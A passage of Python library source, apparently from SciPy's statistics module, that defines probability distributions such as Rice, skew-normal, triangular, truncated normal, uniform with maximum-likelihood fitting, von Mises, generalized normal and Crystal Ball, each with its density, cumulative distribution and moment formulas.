return 0.5*np.log(a*b)+np.log(np.log(b*1.0/a))
reciprocal = reciprocal_gen(name="reciprocal")
class rice_gen(rv_continuous):
r"""A Rice continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rice` is:
.. math::
f(x, b) = x \exp(- \frac{x^2 + b^2}{2}) I_0(x b)
for :math:`x >= 0`, :math:`b > 0`. :math:`I_0` is the modified Bessel
function of order zero (`scipy.special.i0`).
`rice` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
The Rice distribution describes the length, :math:`r`, of a 2-D vector with
components :math:`(U+u, V+v)`, where :math:`U, V` are constant, :math:`u,
v` are independent Gaussian random variables with standard deviation
:math:`s`. Let :math:`R = \sqrt{U^2 + V^2}`. Then the pdf of :math:`r` is
``rice.pdf(x, R/s, scale=s)``.
%(example)s
"""
def _argcheck(self, b):
return b >= 0
def _rvs(self, b):
# https://en.wikipedia.org/wiki/Rice_distribution
t = b/np.sqrt(2) + self._random_state.standard_normal(size=(2,) +
self._size)
return np.sqrt((t*t).sum(axis=0))
def _cdf(self, x, b):
return sc.chndtr(np.square(x), 2, np.square(b))
def _ppf(self, q, b):
return np.sqrt(sc.chndtrix(q, 2, np.square(b)))
def _pdf(self, x, b):
# rice.pdf(x, b) = x * exp(-(x**2+b**2)/2) * I[0](x*b)
#
# We use (x**2 + b**2)/2 = ((x-b)**2)/2 + xb.
# The factor of np.exp(-xb) is then included in the i0e function
# in place of the modified Bessel function, i0, improving
# numerical stability for large values of xb.
return x * np.exp(-(x-b)*(x-b)/2.0) * sc.i0e(x*b)
def _munp(self, n, b):
nd2 = n/2.0
n1 = 1 + nd2
b2 = b*b/2.0
return (2.0**(nd2) * np.exp(-b2) * sc.gamma(n1) *
sc.hyp1f1(n1, 1, b2))
rice = rice_gen(a=0.0, name="rice")
# FIXME: PPF does not work.
class recipinvgauss_gen(rv_continuous):
r"""A reciprocal inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `recipinvgauss` is:
.. math::
f(x, \mu) = \frac{1}{\sqrt{2\pi x}}
\exp\left(\frac{-(1-\mu x)^2}{2\mu^2x}\right)
for :math:`x \ge 0`.
`recipinvgauss` takes ``mu`` as a shape parameter for :math:`\mu`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, mu):
# recipinvgauss.pdf(x, mu) =
# 1/sqrt(2*pi*x) * exp(-(1-mu*x)**2/(2*x*mu**2))
return 1.0/np.sqrt(2*np.pi*x)*np.exp(-(1-mu*x)**2.0 / (2*x*mu**2.0))
def _logpdf(self, x, mu):
return -(1-mu*x)**2.0 / (2*x*mu**2.0) - 0.5*np.log(2*np.pi*x)
def _cdf(self, x, mu):
trm1 = 1.0/mu - x
trm2 = 1.0/mu + x
isqx = 1.0/np.sqrt(x)
return 1.0-_norm_cdf(isqx*trm1)-np.exp(2.0/mu)*_norm_cdf(-isqx*trm2)
def _rvs(self, mu):
return 1.0/self._random_state.wald(mu, 1.0, size=self._size)
recipinvgauss = recipinvgauss_gen(a=0.0, name='recipinvgauss')
class semicircular_gen(rv_continuous):
r"""A semicircular continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `semicircular` is:
.. math::
f(x) = \frac{2}{\pi} \sqrt{1-x^2}
for :math:`-1 \le x \le 1`.
%(after_notes)s
References
----------
.. [1] "Wigner semicircle distribution",
https://en.wikipedia.org/wiki/Wigner_semicircle_distribution
%(example)s
"""
def _pdf(self, x):
return 2.0/np.pi*np.sqrt(1-x*x)
def _cdf(self, x):
return 0.5+1.0/np.pi*(x*np.sqrt(1-x*x) + np.arcsin(x))
def _rvs(self):
# generate values uniformly distributed on the area under the pdf
# (semi-circle) by randomly generating the radius and angle
r = np.sqrt(self._random_state.random_sample(size=self._size))
a = np.cos(np.pi * self._random_state.random_sample(size=self._size))
return r * a
def _stats(self):
return 0, 0.25, 0, -1.0
def _entropy(self):
return 0.64472988584940017414
semicircular = semicircular_gen(a=-1.0, b=1.0, name="semicircular")
class skew_norm_gen(rv_continuous):
r"""A skew-normal random variable.
%(before_notes)s
Notes
-----
The pdf is::
skewnorm.pdf(x, a) = 2 * norm.pdf(x) * norm.cdf(a*x)
`skewnorm` takes a real number :math:`a` as a skewness parameter
When ``a = 0`` the distribution is identical to a normal distribution
(`norm`). `rvs` implements the method of [1]_.
%(after_notes)s
%(example)s
References
----------
.. [1] A. Azzalini and A. Capitanio (1999). Statistical applications of the
multivariate skew-normal distribution. J. Roy. Statist. Soc., B 61, 579-602.
http://azzalini.stat.unipd.it/SN/faq-r.html
"""
def _argcheck(self, a):
return np.isfinite(a)
def _pdf(self, x, a):
return 2.*_norm_pdf(x)*_norm_cdf(a*x)
def _cdf_single(self, x, *args):
_a, _b = self._get_support(*args)
if x <= 0:
cdf = integrate.quad(self._pdf, _a, x, args=args)[0]
else:
t1 = integrate.quad(self._pdf, _a, 0, args=args)[0]
t2 = integrate.quad(self._pdf, 0, x, args=args)[0]
cdf = t1 + t2
if cdf > 1:
# Presumably numerical noise, e.g. 1.0000000000000002
cdf = 1.0
return cdf
def _sf(self, x, a):
return self._cdf(-x, -a)
def _rvs(self, a):
u0 = self._random_state.normal(size=self._size)
v = self._random_state.normal(size=self._size)
d = a/np.sqrt(1 + a**2)
u1 = d*u0 + v*np.sqrt(1 - d**2)
return np.where(u0 >= 0, u1, -u1)
def _stats(self, a, moments='mvsk'):
output = [None, None, None, None]
const = np.sqrt(2/np.pi) * a/np.sqrt(1 + a**2)
if 'm' in moments:
output[0] = const
if 'v' in moments:
output[1] = 1 - const**2
if 's' in moments:
output[2] = ((4 - np.pi)/2) * (const/np.sqrt(1 - const**2))**3
if 'k' in moments:
output[3] = (2*(np.pi - 3)) * (const**4/(1 - const**2)**2)
return output
skewnorm = skew_norm_gen(name='skewnorm')
class trapz_gen(rv_continuous):
r"""A trapezoidal continuous random variable.
%(before_notes)s
Notes
-----
The trapezoidal distribution can be represented with an up-sloping line
from ``loc`` to ``(loc + c*scale)``, then constant to ``(loc + d*scale)``
and then downsloping from ``(loc + d*scale)`` to ``(loc+scale)``.
`trapz` takes :math:`c` and :math:`d` as shape parameters.
%(after_notes)s
The standard form is in the range [0, 1] with c the mode.
The location parameter shifts the start to `loc`.
The scale parameter changes the width from 1 to `scale`.
%(example)s
"""
def _argcheck(self, c, d):
return (c >= 0) & (c <= 1) & (d >= 0) & (d <= 1) & (d >= c)
def _pdf(self, x, c, d):
u = 2 / (d-c+1)
return _lazyselect([x < c,
(c <= x) & (x <= d),
x > d],
[lambda x, c, d, u: u * x / c,
lambda x, c, d, u: u,
lambda x, c, d, u: u * (1-x) / (1-d)],
(x, c, d, u))
def _cdf(self, x, c, d):
return _lazyselect([x < c,
(c <= x) & (x <= d),
x > d],
[lambda x, c, d: x**2 / c / (d-c+1),
lambda x, c, d: (c + 2 * (x-c)) / (d-c+1),
lambda x, c, d: 1-((1-x) ** 2
/ (d-c+1) / (1-d))],
(x, c, d))
def _ppf(self, q, c, d):
qc, qd = self._cdf(c, c, d), self._cdf(d, c, d)
condlist = [q < qc, q <= qd, q > qd]
choicelist = [np.sqrt(q * c * (1 + d - c)),
0.5 * q * (1 + d - c) + 0.5 * c,
1 - np.sqrt((1 - q) * (d - c + 1) * (1 - d))]
return np.select(condlist, choicelist)
trapz = trapz_gen(a=0.0, b=1.0, name="trapz")
class triang_gen(rv_continuous):
r"""A triangular continuous random variable.
%(before_notes)s
Notes
-----
The triangular distribution can be represented with an up-sloping line from
``loc`` to ``(loc + c*scale)`` and then downsloping for ``(loc + c*scale)``
to ``(loc + scale)``.
`triang` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
The standard form is in the range [0, 1] with c the mode.
The location parameter shifts the start to `loc`.
The scale parameter changes the width from 1 to `scale`.
%(example)s
"""
def _rvs(self, c):
return self._random_state.triangular(0, c, 1, self._size)
def _argcheck(self, c):
return (c >= 0) & (c <= 1)
def _pdf(self, x, c):
# 0: edge case where c=0
# 1: generalised case for x < c, don't use x <= c, as it doesn't cope
# with c = 0.
# 2: generalised case for x >= c, but doesn't cope with c = 1
# 3: edge case where c=1
r = _lazyselect([c == 0,
x < c,
(x >= c) & (c != 1),
c == 1],
[lambda x, c: 2 - 2 * x,
lambda x, c: 2 * x / c,
lambda x, c: 2 * (1 - x) / (1 - c),
lambda x, c: 2 * x],
(x, c))
return r
def _cdf(self, x, c):
r = _lazyselect([c == 0,
x < c,
(x >= c) & (c != 1),
c == 1],
[lambda x, c: 2*x - x*x,
lambda x, c: x * x / c,
lambda x, c: (x*x - 2*x + c) / (c-1),
lambda x, c: x * x],
(x, c))
return r
def _ppf(self, q, c):
return np.where(q < c, np.sqrt(c * q), 1-np.sqrt((1-c) * (1-q)))
def _stats(self, c):
return ((c+1.0)/3.0,
(1.0-c+c*c)/18,
np.sqrt(2)*(2*c-1)*(c+1)*(c-2) / (5*np.power((1.0-c+c*c), 1.5)),
-3.0/5.0)
def _entropy(self, c):
return 0.5-np.log(2)
triang = triang_gen(a=0.0, b=1.0, name="triang")
class truncexpon_gen(rv_continuous):
r"""A truncated exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `truncexpon` is:
.. math::
f(x, b) = \frac{\exp(-x)}{1 - \exp(-b)}
for :math:`0 <= x <= b`.
`truncexpon` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, b):
return b > 0
def _get_support(self, b):
return self.a, b
def _pdf(self, x, b):
# truncexpon.pdf(x, b) = exp(-x) / (1-exp(-b))
return np.exp(-x)/(-sc.expm1(-b))
def _logpdf(self, x, b):
return -x - np.log(-sc.expm1(-b))
def _cdf(self, x, b):
return sc.expm1(-x)/sc.expm1(-b)
def _ppf(self, q, b):
return -sc.log1p(q*sc.expm1(-b))
def _munp(self, n, b):
# wrong answer with formula, same as in continuous.pdf
# return sc.gamman+1)-sc.gammainc1+n, b)
if n == 1:
return (1-(b+1)*np.exp(-b))/(-sc.expm1(-b))
elif n == 2:
return 2*(1-0.5*(b*b+2*b+2)*np.exp(-b))/(-sc.expm1(-b))
else:
# return generic for higher moments
# return rv_continuous._mom1_sc(self, n, b)
return self._mom1_sc(n, b)
def _entropy(self, b):
eB = np.exp(b)
return np.log(eB-1)+(1+eB*(b-1.0))/(1.0-eB)
truncexpon = truncexpon_gen(a=0.0, name='truncexpon')
class truncnorm_gen(rv_continuous):
r"""A truncated normal continuous random variable.
%(before_notes)s
Notes
-----
The standard form of this distribution is a standard normal truncated to
the range [a, b] --- notice that a and b are defined over the domain of the
standard normal. To convert clip values for a specific mean and standard
deviation, use::
a, b = (myclip_a - my_mean) / my_std, (myclip_b - my_mean) / my_std
`truncnorm` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b):
return a < b
def _get_support(self, a, b):
return a, b
def _get_norms(self, a, b):
_nb = _norm_cdf(b)
_na = _norm_cdf(a)
_sb = _norm_sf(b)
_sa = _norm_sf(a)
_delta = np.where(a > 0, _sa - _sb, _nb - _na)
with np.errstate(divide='ignore'):
return _na, _nb, _sa, _sb, _delta, np.log(_delta)
def _pdf(self, x, a, b):
ans = self._get_norms(a, b)
_delta = ans[4]
return _norm_pdf(x) / _delta
def _logpdf(self, x, a, b):
ans = self._get_norms(a, b)
_logdelta = ans[5]
return _norm_logpdf(x) - _logdelta
def _cdf(self, x, a, b):
ans = self._get_norms(a, b)
_na, _delta = ans[0], ans[4]
return (_norm_cdf(x) - _na) / _delta
def _ppf(self, q, a, b):
# XXX Use _lazywhere...
ans = self._get_norms(a, b)
_na, _nb, _sa, _sb = ans[:4]
ppf = np.where(a > 0,
_norm_isf(q*_sb + _sa*(1.0-q)),
_norm_ppf(q*_nb + _na*(1.0-q)))
return ppf
def _stats(self, a, b):
ans = self._get_norms(a, b)
nA, nB = ans[:2]
d = nB - nA
pA, pB = _norm_pdf(a), _norm_pdf(b)
mu = (pA - pB) / d # correction sign
mu2 = 1 + (a*pA - b*pB) / d - mu*mu
return mu, mu2, None, None
truncnorm = truncnorm_gen(name='truncnorm')
# FIXME: RVS does not work.
class tukeylambda_gen(rv_continuous):
r"""A Tukey-Lamdba continuous random variable.
%(before_notes)s
Notes
-----
A flexible distribution, able to represent and interpolate between the
following distributions:
- Cauchy (:math:`lambda = -1`)
- logistic (:math:`lambda = 0`)
- approx Normal (:math:`lambda = 0.14`)
- uniform from -1 to 1 (:math:`lambda = 1`)
`tukeylambda` takes a real number :math:`lambda` (denoted ``lam``
in the implementation) as a shape parameter.
%(after_notes)s
%(example)s
"""
def _argcheck(self, lam):
return np.ones(np.shape(lam), dtype=bool)
def _pdf(self, x, lam):
Fx = np.asarray(sc.tklmbda(x, lam))
Px = Fx**(lam-1.0) + (np.asarray(1-Fx))**(lam-1.0)
Px = 1.0/np.asarray(Px)
return np.where((lam <= 0) | (abs(x) < 1.0/np.asarray(lam)), Px, 0.0)
def _cdf(self, x, lam):
return sc.tklmbda(x, lam)
def _ppf(self, q, lam):
return sc.boxcox(q, lam) - sc.boxcox1p(-q, lam)
def _stats(self, lam):
return 0, _tlvar(lam), 0, _tlkurt(lam)
def _entropy(self, lam):
def integ(p):
return np.log(pow(p, lam-1)+pow(1-p, lam-1))
return integrate.quad(integ, 0, 1)[0]
tukeylambda = tukeylambda_gen(name='tukeylambda')
class FitUniformFixedScaleDataError(FitDataError):
def __init__(self, ptp, fscale):
self.args = (
"Invalid values in `data`. Maximum likelihood estimation with "
"the uniform distribution and fixed scale requires that "
"data.ptp() <= fscale, but data.ptp() = %r and fscale = %r." %
(ptp, fscale),
)
class uniform_gen(rv_continuous):
r"""A uniform continuous random variable.
In the standard form, the distribution is uniform on ``[0, 1]``. Using
the parameters ``loc`` and ``scale``, one obtains the uniform distribution
on ``[loc, loc + scale]``.
%(before_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.uniform(0.0, 1.0, self._size)
def _pdf(self, x):
return 1.0*(x == x)
def _cdf(self, x):
return x
def _ppf(self, q):
return q
def _stats(self):
return 0.5, 1.0/12, 0, -1.2
def _entropy(self):
return 0.0
def fit(self, data, *args, **kwds):
"""
Maximum likelihood estimate for the location and scale parameters.
`uniform.fit` uses only the following parameters. Because exact
formulas are used, the parameters related to optimization that are
available in the `fit` method of other distributions are ignored
here. The only positional argument accepted is `data`.
Parameters
----------
data : array_like
Data to use in calculating the maximum likelihood estimate.
floc : float, optional
Hold the location parameter fixed to the specified value.
fscale : float, optional
Hold the scale parameter fixed to the specified value.
Returns
-------
loc, scale : float
Maximum likelihood estimates for the location and scale.
Notes
-----
An error is raised if `floc` is given and any values in `data` are
less than `floc`, or if `fscale` is given and `fscale` is less
than ``data.max() - data.min()``. An error is also raised if both
`floc` and `fscale` are given.
Examples
--------
>>> from scipy.stats import uniform
We'll fit the uniform distribution to `x`:
>>> x = np.array([2, 2.5, 3.1, 9.5, 13.0])
For a uniform distribution MLE, the location is the minimum of the
data, and the scale is the maximum minus the minimum.
>>> loc, scale = uniform.fit(x)
>>> loc
2.0
>>> scale
11.0
If we know the data comes from a uniform distribution where the support
starts at 0, we can use `floc=0`:
>>> loc, scale = uniform.fit(x, floc=0)
>>> loc
0.0
>>> scale
13.0
Alternatively, if we know the length of the support is 12, we can use
`fscale=12`:
>>> loc, scale = uniform.fit(x, fscale=12)
>>> loc
1.5
>>> scale
12.0
In that last example, the support interval is [1.5, 13.5]. This
solution is not unique. For example, the distribution with ``loc=2``
and ``scale=12`` has the same likelihood as the one above. When
`fscale` is given and it is larger than ``data.max() - data.min()``,
the parameters returned by the `fit` method center the support over
the interval ``[data.min(), data.max()]``.
"""
if len(args) > 0:
raise TypeError("Too many arguments.")
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
# MLE for the uniform distribution
# --------------------------------
# The PDF is
#
# f(x, loc, scale) = {1/scale for loc <= x <= loc + scale
# {0 otherwise}
#
# The likelihood function is
# L(x, loc, scale) = (1/scale)**n
# where n is len(x), assuming loc <= x <= loc + scale for all x.
# The log-likelihood is
# l(x, loc, scale) = -n*log(scale)
# The log-likelihood is maximized by making scale as small as possible,
# while keeping loc <= x <= loc + scale. So if neither loc nor scale
# are fixed, the log-likelihood is maximized by choosing
# loc = x.min()
# scale = x.ptp()
# If loc is fixed, it must be less than or equal to x.min(), and then
# the scale is
# scale = x.max() - loc
# If scale is fixed, it must not be less than x.ptp(). If scale is
# greater than x.ptp(), the solution is not unique. Note that the
# likelihood does not depend on loc, except for the requirement that
# loc <= x <= loc + scale. All choices of loc for which
# x.max() - scale <= loc <= x.min()
# have the same log-likelihood. In this case, we choose loc such that
# the support is centered over the interval [data.min(), data.max()]:
# loc = x.min() = 0.5*(scale - x.ptp())
if fscale is None:
# scale is not fixed.
if floc is None:
# loc is not fixed, scale is not fixed.
loc = data.min()
scale = data.ptp()
else:
# loc is fixed, scale is not fixed.
loc = floc
scale = data.max() - loc
if data.min() < loc:
raise FitDataError("uniform", lower=loc, upper=loc + scale)
else:
# loc is not fixed, scale is fixed.
ptp = data.ptp()
if ptp > fscale:
raise FitUniformFixedScaleDataError(ptp=ptp, fscale=fscale)
# If ptp < fscale, the ML estimate is not unique; see the comments
# above. We choose the distribution for which the support is
# centered over the interval [data.min(), data.max()].
loc = data.min() - 0.5*(fscale - ptp)
scale = fscale
# We expect the return values to be floating point, so ensure it
# by explicitly converting to float.
return float(loc), float(scale)
uniform = uniform_gen(a=0.0, b=1.0, name='uniform')
class vonmises_gen(rv_continuous):
r"""A Von Mises continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `vonmises` and `vonmises_line` is:
.. math::
f(x, \kappa) = \frac{ \exp(\kappa \cos(x)) }{ 2 \pi I_0(\kappa) }
for :math:`-\pi \le x \le \pi`, :math:`\kappa > 0`. :math:`I_0` is the
modified Bessel function of order zero (`scipy.special.i0`).
`vonmises` is a circular distribution which does not restrict the
distribution to a fixed interval. Currently, there is no circular
distribution framework in scipy. The ``cdf`` is implemented such that
``cdf(x + 2*np.pi) == cdf(x) + 1``.
`vonmises_line` is the same distribution, defined on :math:`[-\pi, \pi]`
on the real line. This is a regular (i.e. non-circular) distribution.
`vonmises` and `vonmises_line` take ``kappa`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, kappa):
return self._random_state.vonmises(0.0, kappa, size=self._size)
def _pdf(self, x, kappa):
# vonmises.pdf(x, \kappa) = exp(\kappa * cos(x)) / (2*pi*I[0](\kappa))
return np.exp(kappa * np.cos(x)) / (2*np.pi*sc.i0(kappa))
def _cdf(self, x, kappa):
return _stats.von_mises_cdf(kappa, x)
def _stats_skip(self, kappa):
return 0, None, 0, None
def _entropy(self, kappa):
return (-kappa * sc.i1(kappa) / sc.i0(kappa) +
np.log(2 * np.pi * sc.i0(kappa)))
vonmises = vonmises_gen(name='vonmises')
vonmises_line = vonmises_gen(a=-np.pi, b=np.pi, name='vonmises_line')
class wald_gen(invgauss_gen):
r"""A Wald continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wald` is:
.. math::
f(x) = \frac{1}{\sqrt{2\pi x^3}} \exp(- \frac{ (x-1)^2 }{ 2x })
for :math:`x >= 0`.
`wald` is a special case of `invgauss` with ``mu=1``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self):
return self._random_state.wald(1.0, 1.0, size=self._size)
def _pdf(self, x):
# wald.pdf(x) = 1/sqrt(2*pi*x**3) * exp(-(x-1)**2/(2*x))
return invgauss._pdf(x, 1.0)
def _logpdf(self, x):
return invgauss._logpdf(x, 1.0)
def _cdf(self, x):
return invgauss._cdf(x, 1.0)
def _stats(self):
return 1.0, 1.0, 3.0, 15.0
wald = wald_gen(a=0.0, name="wald")
class wrapcauchy_gen(rv_continuous):
r"""A wrapped Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `wrapcauchy` is:
.. math::
f(x, c) = \frac{1-c^2}{2\pi (1+c^2 - 2c \cos(x))}
for :math:`0 \le x \le 2\pi`, :math:`0 < c < 1`.
`wrapcauchy` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return (c > 0) & (c < 1)
def _pdf(self, x, c):
# wrapcauchy.pdf(x, c) = (1-c**2) / (2*pi*(1+c**2-2*c*cos(x)))
return (1.0-c*c)/(2*np.pi*(1+c*c-2*c*np.cos(x)))
def _cdf(self, x, c):
output = np.zeros(x.shape, dtype=x.dtype)
val = (1.0+c)/(1.0-c)
c1 = x < np.pi
c2 = 1-c1
xp = np.extract(c1, x)
xn = np.extract(c2, x)
if np.any(xn):
valn = np.extract(c2, np.ones_like(x)*val)
xn = 2*np.pi - xn
yn = np.tan(xn/2.0)
on = 1.0-1.0/np.pi*np.arctan(valn*yn)
np.place(output, c2, on)
if np.any(xp):
valp = np.extract(c1, np.ones_like(x)*val)
yp = np.tan(xp/2.0)
op = 1.0/np.pi*np.arctan(valp*yp)
np.place(output, c1, op)
return output
def _ppf(self, q, c):
val = (1.0-c)/(1.0+c)
rcq = 2*np.arctan(val*np.tan(np.pi*q))
rcmq = 2*np.pi-2*np.arctan(val*np.tan(np.pi*(1-q)))
return np.where(q < 1.0/2, rcq, rcmq)
def _entropy(self, c):
return np.log(2*np.pi*(1-c*c))
wrapcauchy = wrapcauchy_gen(a=0.0, b=2*np.pi, name='wrapcauchy')
class gennorm_gen(rv_continuous):
r"""A generalized normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gennorm` is [1]_:
.. math::
f(x, \beta) = \frac{\beta}{2 \Gamma(1/\beta)} \exp(-|x|^\beta)
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`gennorm` takes ``beta`` as a shape parameter for :math:`\beta`.
For :math:`\beta = 1`, it is identical to a Laplace distribution.
For :math:`\beta = 2`, it is identical to a normal distribution
(with ``scale=1/sqrt(2)``).
See Also
--------
laplace : Laplace distribution
norm : normal distribution
References
----------
.. [1] "Generalized normal distribution, Version 1",
https://en.wikipedia.org/wiki/Generalized_normal_distribution#Version_1
%(example)s
"""
def _pdf(self, x, beta):
return np.exp(self._logpdf(x, beta))
def _logpdf(self, x, beta):
return np.log(0.5*beta) - sc.gammaln(1.0/beta) - abs(x)**beta
def _cdf(self, x, beta):
c = 0.5 * np.sign(x)
# evaluating (.5 + c) first prevents numerical cancellation
return (0.5 + c) - c * sc.gammaincc(1.0/beta, abs(x)**beta)
def _ppf(self, x, beta):
c = np.sign(x - 0.5)
# evaluating (1. + c) first prevents numerical cancellation
return c * sc.gammainccinv(1.0/beta, (1.0 + c) - 2.0*c*x)**(1.0/beta)
def _sf(self, x, beta):
return self._cdf(-x, beta)
def _isf(self, x, beta):
return -self._ppf(x, beta)
def _stats(self, beta):
c1, c3, c5 = sc.gammaln([1.0/beta, 3.0/beta, 5.0/beta])
return 0., np.exp(c3 - c1), 0., np.exp(c5 + c1 - 2.0*c3) - 3.
def _entropy(self, beta):
return 1. / beta - np.log(.5 * beta) + sc.gammaln(1. / beta)
gennorm = gennorm_gen(name='gennorm')
class halfgennorm_gen(rv_continuous):
r"""The upper half of a generalized normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `halfgennorm` is:
.. math::
f(x, \beta) = \frac{\beta}{\Gamma(1/\beta)} \exp(-|x|^\beta)
for :math:`x > 0`. :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
`gennorm` takes ``beta`` as a shape parameter for :math:`\beta`.
For :math:`\beta = 1`, it is identical to an exponential distribution.
For :math:`\beta = 2`, it is identical to a half normal distribution
(with ``scale=1/sqrt(2)``).
See Also
--------
gennorm : generalized normal distribution
expon : exponential distribution
halfnorm : half normal distribution
References
----------
.. [1] "Generalized normal distribution, Version 1",
https://en.wikipedia.org/wiki/Generalized_normal_distribution#Version_1
%(example)s
"""
def _pdf(self, x, beta):
# beta
# halfgennorm.pdf(x, beta) = ------------- exp(-|x|**beta)
# gamma(1/beta)
return np.exp(self._logpdf(x, beta))
def _logpdf(self, x, beta):
return np.log(beta) - sc.gammaln(1.0/beta) - x**beta
def _cdf(self, x, beta):
return sc.gammainc(1.0/beta, x**beta)
def _ppf(self, x, beta):
return sc.gammaincinv(1.0/beta, x)**(1.0/beta)
def _sf(self, x, beta):
return sc.gammaincc(1.0/beta, x**beta)
def _isf(self, x, beta):
return sc.gammainccinv(1.0/beta, x)**(1.0/beta)
def _entropy(self, beta):
return 1.0/beta - np.log(beta) + sc.gammaln(1.0/beta)
halfgennorm = halfgennorm_gen(a=0, name='halfgennorm')
class crystalball_gen(rv_continuous):
r"""
Crystalball distribution
%(before_notes)s
Notes
-----
The probability density function for `crystalball` is:
.. math::
f(x, \beta, m) = \begin{cases}
N \exp(-x^2 / 2), &\text{for } x > -\beta\\
N A (B - x)^{-m} &\text{for } x \le -\beta
\end{cases}
where :math:`A = (m / |\beta|)^n \exp(-\beta^2 / 2)`,
:math:`B = m/|\beta| - |\beta|` and :math:`N` is a normalisation constant.
`crystalball` takes :math:`\beta > 0` and :math:`m > 1` as shape
parameters. :math:`\beta` defines the point where the pdf changes
from a power-law to a Gaussian distribution. :math:`m` is the power
of the power-law tail.
References
----------
.. [1] "Crystal Ball Function",
https://en.wikipedia.org/wiki/Crystal_Ball_function
%(after_notes)s
.. versionadded:: 0.19.0
%(example)s
"""
def _pdf(self, x, beta, m):
"""
Return PDF of the crystalball function.
--
| exp(-x**2 / 2), for x > -beta
crystalball.pdf(x, beta, m) = N * |
| A * (B - x)**(-m), for x <= -beta
--
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def rhs(x, beta, m):
return np.exp(-x**2 / 2)
def lhs(x, beta, m):
return ((m/beta)**m * np.exp(-beta**2 / 2.0) *
(m/beta - beta - x)**(-m))
return N * _lazywhere(x > -beta, (x, beta, m), f=rhs, f2=lhs)
def _logpdf(self, x, beta, m):
"""
Return the log of the PDF of the crystalball function.
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def rhs(x, beta, m):
return -x**2/2
def lhs(x, beta, m):
return m*np.log(m/beta) - beta**2/2 - m*np.log(m/beta - beta - x)
return np.log(N) + _lazywhere(x > -beta, (x, beta, m), f=rhs, f2=lhs)
def _cdf(self, x, beta, m):
"""
Return CDF of the crystalball function
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def rhs(x, beta, m):
return ((m/beta) * np.exp(-beta**2 / 2.0) / (m-1) +
_norm_pdf_C * (_norm_cdf(x) - _norm_cdf(-beta)))
def lhs(x, beta, m):
return ((m/beta)**m * np.exp(-beta**2 / 2.0) *
(m/beta - beta - x)**(-m+1) / (m-1))
return N * _lazywhere(x > -beta, (x, beta, m), f=rhs, f2=lhs)
def _ppf(self, p, beta, m):
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
pbeta = N * (m/beta) * np.exp(-beta**2/2) / (m - 1)
def ppf_less(p, beta, m):
eb2 = np.exp(-beta**2/2)
C = (m/beta) * eb2 / (m-1)
N = 1/(C + _norm_pdf_C * _norm_cdf(beta))
return (m/beta - beta -
((m - 1)*(m/beta)**(-m)/eb2*p/N)**(1/(1-m)))
def ppf_greater(p, beta, m):
eb2 = np.exp(-beta**2/2)
C = (m/beta) * eb2 / (m-1)
N = 1/(C + _norm_pdf_C * _norm_cdf(beta))
return _norm_ppf(_norm_cdf(-beta) + (1/_norm_pdf_C)*(p/N - C))
return _lazywhere(p < pbeta, (p, beta, m), f=ppf_less, f2=ppf_greater)
def _munp(self, n, beta, m):
"""
Returns the n-th non-central moment of the crystalball function.
"""
N = 1.0 / (m/beta / (m-1) * np.exp(-beta**2 / 2.0) +
_norm_pdf_C * _norm_cdf(beta))
def n_th_moment(n, beta, m):
"""
Returns n-th moment. Defined only if n+1 < m
Function cannot broadcast due to the loop over n
"""
A = (m/beta)**m * np.exp(-beta**2 / 2.0)
B = m/beta - beta
rhs = (2**((n-1)/2.0) * sc.gamma((n+1)/2) *
(1.0 + (-1)**n * sc.gammainc((n+1)/2, beta**2 / 2)))
lhs = np.zeros(rhs.shape)
for k in range(n + 1):
lhs += (sc.binom(n, k) * B**(n-k) * (-1)**k / (m - k - 1) *
(m/beta)**(-m + k + 1))
return A * lhs + rhs
return N * _lazywhere(n + 1 < m, (n, beta, m),
np.vectorize(n_th_moment, otypes=[np.float]),
np.inf)
def _argcheck(self, beta, m):
"""
Shape parameter bounds are m > 1 and beta > 0.
"""
return (m > 1) & (beta > 0)
crystalball = crystalball_gen(name='crystalball', longname="A Crystalball Function")
def _argus_phi(chi):
"""
Utility function for the argus distribution
used in the CDF and norm of the Argus Funktion
"""
return _norm_cdf(chi) - chi * _norm_pdf(chi) - 0.5
class argus_gen(rv_continuous):
r"""
Argus distribution
%(before_notes)s
Notes
-----
The probability density function for `argus` is:
.. math::
f(x, \chi) = \frac{\chi^3}{\sqrt{2\pi} \Psi(\chi)} x \sqrt{1-x^2}
\exp(-\chi^2 (1 - x^2)/2)
for :math:`0 < x < 1`, where
.. math::
\Psi(\chi) = \Phi(\chi) - \chi \phi(\chi) - 1/2
with :math:`\Phi` and :math:`\phi` being the CDF and PDF of a standard
normal distribution, respectively.
`argus` takes :math:`\chi` as shape a parameter.
References
----------
.. [1] "ARGUS distribution",
https://en.wikipedia.org/wiki/ARGUS_distribution
